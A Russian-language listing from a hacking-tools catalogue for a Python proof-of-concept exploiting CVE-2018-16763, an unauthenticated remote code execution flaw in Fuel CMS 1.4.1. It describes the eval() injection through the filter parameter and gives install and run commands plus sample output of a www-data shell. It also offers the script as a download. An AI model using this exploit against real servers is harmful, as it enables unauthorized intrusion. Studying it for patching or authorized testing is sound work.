Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC — Python PoC для неаутентифицированного удаленного выполнения кода в Fuel CMS 1.4.1 через параметр `filter`, предоставляющий интерактивную оболочку для выполнения команд. | Kitploit
Инструменты/GitHubGitHub/estebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubestebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc

CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

Python PoC для неаутентифицированного удаленного выполнения кода в Fuel CMS 1.4.1 через параметр `filter`, предоставляющий интерактивную оболочку для выполнения команд.

Репозиторий
15 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-16763 — Fuel CMS 1.4.1 Удаленное выполнение кода (PoC)

Уязвимость неаутентифицированного RCE в Fuel CMS 1.4.1. Параметр filter в конечной точке /fuel/pages/select/ передаётся несанитизированным в вызов eval() в PHP-бэкенде, что позволяет выполнение произвольного кода через специально сформированную полезную нагрузку. В отличие от слепых инъекций, вывод отражается прямо в HTTP-ответе, поэтому промежуточный файл не требуется.


Как это работает

  1. Отправляет GET-запрос к /fuel/pages/select/ со специально сформированной полезной нагрузкой filter, которая вызывает PHP-функцию system() с нужной командой.
  2. Извлекает отражённый вывод из HTTP-ответа с помощью регулярного выражения.
  3. Возвращает вывод команды непосредственно в интерактивную оболочку.

Требования

  • Python 3
  • Установка зависимостей:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Использование

root@kitploit:~
python3 exploit.py -t http://TARGET

Пример:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Проверка выполнения команды...
[+] Цель уязвима! Вывод: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Оболочка открыта. Введите 'exit' или нажмите Ctrl+C для выхода.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit

Ссылки

  • CVE-2018-16763
  • EDB-47138

Авторы

  • Обнаружение и оригинальный эксплойт: Syed Sheeraz Ali
  • Очистка и интерактивная оболочка: Esteban Zárate
Скачать инструмент